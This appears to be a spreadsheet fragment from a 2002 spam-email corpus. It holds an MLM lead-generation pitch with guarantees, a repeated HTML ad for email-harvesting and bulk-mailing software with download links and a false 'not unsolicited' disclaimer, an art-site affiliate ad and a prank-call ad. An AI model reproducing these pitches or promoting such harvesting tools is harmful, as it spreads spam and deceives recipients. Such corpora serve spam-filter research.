    <t>Wed, 24 Jul 2002 11:05:59 +1200</t>
  </si>
  <si>
    <t>"MLM Insider Forum" &lt;mlm3leads4u@amuro.net&gt;</t>
  </si>
  <si>
    <t>Hello,  \n  \n  \n  \n_Premium Phone Qualified  \nBusiness Opportunity Leads  \n  \n_If you're spending money marketing a Business **Opportunity** or **MLM** ,  \nyou will **__definitely_ _**be interested in  \nwhat we have to offer you.  \n  \n  \n\nYou're __tired_ _of blindly spending money for leads and not having  \nany idea what kind of response you'll get from it.  Sometimes  \ncalling 100 people **without one single signup!**   Sometimes  \ntalking to people who have been **bombarded** by bizop pitches  \nto the point of them _hanging up_ when you call!  (Leads oversold)  \n  \nWe're here to help!  \n  \nWe'll get you __qualified leads for your MLM or Business Opportunity.__  \n  \n**Period.**  \n  \nNo qualifiers, no conditions, no nonsense.  \n  \nWe'll do it __quickly,__ and __professionally__.  \n  \n_And we won't ask you for a _single dime_ without **guaranteeing** _results_!  \n  \n  \n_**_Here's How We Generate Our Leads...  \n  \n_**- **All of these Leads are generated IN-HOUSE!  \n  \n**\- One source we use for Lead-generation is a **Business Opportunity  \nSeeker Lead List** of people who have requested info. about making  \nextra income from home by either filling out an online questionnaire,  \nor responding to an email ad, classified ad, postcard, etc.,.  \n  \n\- The other source we use is an Automated Call Center.  \nWe have computerized software that dials up LOCAL residents,  \nplays a recorded message asking them if they're interested in  \nmaking money from home.  If they are, the system records their  \nname and phone number for us to CALL BACK AND QUALIFY.  \n  \n\- The prospects that come from either of the above sources are then  \n**PHONE INTERVIEWED BY US, here in our offices** and the following  \ninfo. is asked (after confirming their desire to find an opportunity):  \n  \n**Name:  \nEmail:  \nPhone:  \nBest time to call:  \nState:  \nReason they want to work from home!:  \nHow much they want to make per month:  \nHow much time they can commit per week:  \nHow much money they have available for startup:  \nIf they see an opportunity, how soon they would get started:  \n  \nWe'll close by telling them they'll be contacted by no  \nmore than 3 or 4 people regarding different opportunities.  \n  \n**\- Then the Leads are submitted to a website we set up for you,  \nfrom which the results are then forwarded to you by email.  \n  \n\- This way, **you get the Leads fresh, and in *real-time***  \n(only minutes old).  Never more than 24 hours old.  Guaranteed!  \n  \n\- We **GUARANTEE** that you'll receive _AT LEAST_ a valid _Name_ ,  \n_Phone Number_ and the _Time-Date Stamp_ corresponding to when  \nthe Lead was generated!  However, almost ALL leads will have  \nALL of the information asked above.  \n  \n  \n**Benefits of our Phone Qualified Lead Generation System:  \n  \n**1\. They will be **Extremely Qualified** due to the nature of the  \nqualifying questions that will be asked (above).  \n  \n2\. They are **Super-Fresh!**   Delivered in Real-Time only **moments  \n**after they are contacted and qualified!  (Not 30-120 days old)  \n  \n3\. They're **Targeted.**   Each Lead we generate originates from a  \ntargeted list of business opportunity seekers.  \n  \n4\. They're **Highly Receptive!**   **Receptivity is very, very high**  \nbecause they **aren't bombarded by tons of people pitching  \nthem on opportunities!**  Also they'll remember speaking to  \nsomeone over the phone.  Especially since **we tell them to  \nexpect your call!  \n  \n**5\. **No "feast or famine"** activity.  Leads will be coming in  \nregularly.  You dictate the flow!  \n  \n6\. **No more cold calls!   **We tell your prospects you'll be calling.  \n  \n7\. You can ***personalize* your approach** with the info. you  \nget with each Lead!  \n  \n8\. **Save Time.   **Naturally, better Leads means less calls to get a sale.  \n  \n9\. **Lower "burnout" factor.**  Calling red-hot Leads makes it easier  \nto pick up the phone, day in and day out.  \n  \n10\. You can **sort your Leads** based on their responses and call the  \nhottest ones first.  \n  \n11\. You can **get new reps started quicker** using these Leads due  \nto **higher closing ratios**.  Of course, this builds faster and stronger  \nmomentum, and skyrockets "new rep retention" as a result of  \n"quick successes".  \n  \n12\. The **Leads will be uniform** \- almost all leads will have the info.  \nindicated above. (All leads will have valid phone numbers.)  \n  \n13\. They're **double-qualified** because to generate the Lead,  \na list of previous business opportunity seekers is used.  \n  \n14\. Excellent **control of the flow of Leads** coming through.  \n  \nIf you've been trying to run things too long without a _steady flow_ of high  \nquality leads, call us __NOW__ to get things in motion.  Just let us know  \nwhat program you want to advertise and we'll create a customized  \nlead-generation campaign for you.  \n  \nSince your need to get business moving has probably never been  \nmore critical than it is today, why not call us **_NOW!  \n  \n_**These are **__fresh, highly qualified leads__** because these people aren't  \njust responding to some "Generic Business Opportunity" ad, they're  \ncontacted **over the phone specifically** for **_YOUR_** company!  And we  \nforward you the leads within **_minutes_** of the lead being generated - not  \ndays, weeks, or months!  \n  \n  \n\nStart Generating As Many **SIGN-UPS** as You Can Handle!  \nExplode Your Downline and Income!  \n  \n**Call For Details and Discount Pricing!  \nToll Free _1-866-853-8319_ ext.1  \n  \n**Or email us here for full details  \n  \n  \n  \n\nTo opt out _Click Here  \n  \n  \n_ \--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422</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: emailharvest@email.com\nDate: Wed, 24 Jul 2002 10:07:51 +0800</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:07:51 +0800</t>
  </si>
  <si>
    <t>emailharvest@email.com</t>
  </si>
  <si>
    <t>Harvest lots of E-mail addresses quickly !</t>
  </si>
  <si>
    <t>Dear fork =2C\n\n=3CBODY bgColor=3D#ffccff=3E\n=3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E\n  =3CTBODY=3E\n  =3CTR=3E\n    =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E\n=3CTABLE=3E\n  =3CTBODY=3E\n  =3CTR=3E\n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E\n    =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 \n      face=3D=22Arial Black=22 \n      size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want   \n      To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E   \n      =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email   \n      Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B   \n      a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B   \n      harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT   \n      color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT   \n      color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT   \n      color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email   \n      servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CUL=3E  \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It   \n        is intended for easy and convenient search large e-mail address lists   \n        from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000   \n        and NT=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512   \n        connections=29=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail   \n        server if the server has disconnected and continue the searching at the   \n        point where it has been interrupted=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up   \n        and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E  \n      =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email   \n      address searcher and bulk e-mail sender=2E It can verify more than 5500   \n      email addresses per minute at only 56Kbps speed=2E It even allows you send   \n      email to valid email address while searching=2E You can save the searching   \n      progress and load it to resume work at your convenience=2E All you need to   \n      do is just input an email address=2C and press the =22Search=22   \n      button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  \n      =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#FF00FF=22=3EVery \n      Low Price ! -------&amp;nbsp=3B Now=2C&amp;nbsp=3B The full version of Easy Email \n      Searcher only costs =3C=2Ffont=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#0000FF=22=3E$ \n      39=2E 95=3C=2Ffont=3E=3C=2FB=3E=3C=2FP=3E \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To   \n      Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA  \n      href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site   \n      1=3C=2FA=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   \n      href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site   \n      2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial \n      size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please   \n      copy the following link into your URL =2C and then click =22 Enter=22 on your   \n      Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the   \n      download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CDIV=3E  \n      =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E  \n      =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E  \n      =3CP=3E=3C=2FP=3E=3C=2FTD=3E  \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E  \n  =3CTR=3E  \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E  \n    =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff   \n      face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22   \n      size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending   \n      unsolicited emails to those who do not wish to receive our special   \n      mailings=2E We have attained the services of an independent 3rd party to   \n      overlook list management and removal services=2E This is not unsolicited   \n      email=2E If you do not wish to receive further mailings=2C please click this   \n      link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22   \n      target=3D=5Fblank=3E=3CFONT   \n      color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn  \n      =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080  \n      face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant  \n      with all federal and state laws regarding email messages including the  \n      California Business and Professions Code=2E We have provided the subject  \n      line =22ADV=22 to provide you notification that this is a commercial  \n      advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E \n=3CBR=3E\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5452</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Artprice.com" &lt;info@artmarket.com&gt;\nDate: Wed, 24 Jul 2002 09:46:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 09:46:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>"Artprice.com" &lt;info@artmarket.com&gt;</t>
  </si>
  <si>
    <t>Become an affiliate. Devenez site affili.</t>
  </si>
  <si>
    <t>With Artprice, the world leader in art market information, enhance your                         website content!                          Make the most valuable information on artist available to your customers,                         and get high commissions!                                          Posez sur votre site la barre de recherche Artprice et bnficiez immdiatement                     de revenus supplmentaires (en français)   Paying right from the moment the link is available to your visitors                         !                          By becoming an Artprice affiliate, each                                         month you'll get from 20 to 50% in revenue share for all purchases                                         at [URL]www.artprice.com[/URL] by customers coming from your site.  Total monthly purchase  Commission rate  Monthly revenue share From USD0 to USD1000  20% Up to USD200  From USD1001 to USD5000 30% From USD300                                                 to USD1500 From USD5001 to USD15000  40% From USD2000                                                 to USD6000 Over USD15 001   50% Over USD7500 More information on our affiliation program! Marketing@artprice.com             Tel : +33 472 421 732 or +33 478 220 000 To be removed from our mailing list (In english) Avec Artprice, le leader mondial de l'information sur le marché                         de l'art, enrichissez votre contenu en offrant aux visiteurs de votre                         site la barre de recherche artistes Artprice  ...et bnficiez immdiatement de revenus supplmentaires comme dj                         des centaines d'autres affilis !                          Artprice vous reverse tous les mois de 20%                                          50% sur les achats effectus par les clients venant de votre site                                         :  Tranche de CA mensuel HT  Taux de reversion  Montant de la reversion mensuelle  De 0  1000 euros 20% Jusqu' 200 euros  De 1001  5000 euros 30% De 300 1500 euros  De 5001  15000 euros 40% De 2000 6000 euros  Au dessus de 15 000 euros  50% Plus de 7500                                                 euros Plus d'informations sur notre programme d'affiliation :                                      Marketing@artprice.com                                  Tl : +33 472 421 732 ou +33 478 220 000 Se dsinscrire [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>www.artprice.com http://xent.com</t>
  </si>
  <si>
    <t>5431</t>
  </si>
  <si>
    <t>To: Joker@netnoteinc.com\nFrom: UK Prank Calls &lt;ncprankservice@blueyonder.co.uk&gt;\nDate: Wed, 24 Jul 2002 07:50:10 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 07:50:10 +0100</t>
  </si>
  <si>
    <t>UK Prank Calls &lt;ncprankservice@blueyonder.co.uk&gt;</t>
  </si>
  <si>
    <t>Joker@netnoteinc.com</t>
  </si>
  <si>
    <t>Hilarious Prank Call Service</t>
  </si>
  <si>
    <t>Please visit [URL]http://ukprankcalls.com[/URL] to play a hilarious joke on your mates!</t>
  </si>
  <si>
    <t>http://ukprankcalls.com</t>
  </si>
  <si>
    <t>5412</t>
  </si>
  <si>
    <t>To: cypherpunks@minder.net\nFrom: emailharvest@email.com\nDate: Wed, 24 Jul 2002 06:34:53 +0800</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 06:34:53 +0800</t>
  </si>
  <si>
    <t>cypherpunks@minder.net</t>
  </si>
  <si>
    <t>Dear cypherpunks =2C\n\n=3CBODY bgColor=3D#ffccff=3E\n=3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E\n  =3CTBODY=3E\n  =3CTR=3E\n    =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E\n=3CTABLE=3E\n  =3CTBODY=3E\n  =3CTR=3E\n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E\n    =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 \n      face=3D=22Arial Black=22 \n      size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want   \n      To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E   \n      =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email   \n      Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B   \n      a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B   \n      harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT   \n      color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT   \n      color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT   \n      color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email   \n      servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CUL=3E  \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It   \n        is intended for easy and convenient search large e-mail address lists   \n        from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000   \n        and NT=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512   \n        connections=29=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail   \n        server if the server has disconnected and continue the searching at the   \n        point where it has been interrupted=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up   \n        and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E  \n      =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email   \n      address searcher and bulk e-mail sender=2E It can verify more than 5500   \n      email addresses per minute at only 56Kbps speed=2E It even allows you send   \n      email to valid email address while searching=2E You can save the searching   \n      progress and load it to resume work at your convenience=2E All you need to   \n      do is just input an email address=2C and press the =22Search=22   \n      button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  \n      =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#FF00FF=22=3EVery \n      Low Price ! -------&amp;nbsp=3B Now=2C&amp;nbsp=3B The full version of Easy Email \n      Searcher only costs =3C=2Ffont=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#0000FF=22=3E$ \n      39=2E 95=3C=2Ffont=3E=3C=2FB=3E=3C=2FP=3E \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To   \n      Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA  \n      href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site   \n      1=3C=2FA=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   \n      href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site   \n      2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial \n      size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please   \n      copy the following link into your URL =2C and then click =22 Enter=22 on your   \n      Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the   \n      download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CDIV=3E  \n      =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E  \n      =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E  \n      =3CP=3E=3C=2FP=3E=3C=2FTD=3E  \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E  \n  =3CTR=3E  \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E  \n    =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff   \n      face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22   \n      size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending   \n      unsolicited emails to those who do not wish to receive our special   \n      mailings=2E We have attained the services of an independent 3rd party to   \n      overlook list management and removal services=2E This is not unsolicited   \n      email=2E If you do not wish to receive further mailings=2C please click this   \n      link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22   \n      target=3D=5Fblank=3E=3CFONT   \n      color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn  \n      =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080  \n      face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant  \n      with all federal and state laws regarding email messages including the  \n      California Business and Professions Code=2E We have provided the subject  \n      line =22ADV=22 to provide you notification that this is a commercial  \n      advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E \n=3CBR=3E\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409</t>
  </si>
  <si>
    <t>To: cpunks@minder.net\nFrom: emailharvest@email.com\nDate: Wed, 24 Jul 2002 06:11:09 +0800</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 06:11:09 +0800</t>
  </si>
  <si>
    <t>Dear cpunks =2C\n\n=3CBODY bgColor=3D#ffccff=3E\n=3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E\n  =3CTBODY=3E\n  =3CTR=3E\n    =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E\n=3CTABLE=3E\n  =3CTBODY=3E\n  =3CTR=3E\n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E\n    =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 \n      face=3D=22Arial Black=22 \n      size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want   \n      To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E   \n      =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email   \n      Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B   \n      a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B   \n      harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT   \n      color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT   \n      color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT   \n      color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email   \n      servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CUL=3E  \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It   \n        is intended for easy and convenient search large e-mail address lists   \n        from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000   \n        and NT=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512   \n        connections=29=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail   \n        server if the server has disconnected and continue the searching at the   \n        point where it has been interrupted=2E=3C=2FFONT=3E   \n        =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   \n        Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up   \n        and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E  \n      =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email   \n      address searcher and bulk e-mail sender=2E It can verify more than 5500   \n      email addresses per minute at only 56Kbps speed=2E It even allows you send   \n      email to valid email address while searching=2E You can save the searching   \n      progress and load it to resume work at your convenience=2E All you need to   \n      do is just input an email address=2C and press the =22Search=22   \n      button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  \n      =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#FF00FF=22=3EVery \n      Low Price ! -------&amp;nbsp=3B Now=2C&amp;nbsp=3B The full version of Easy Email \n      Searcher only costs =3C=2Ffont=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#0000FF=22=3E$ \n      39=2E 95=3C=2Ffont=3E=3C=2FB=3E=3C=2FP=3E \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To   \n      Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA  \n      href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site   \n      1=3C=2FA=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  \n      =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   \n      href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site   \n      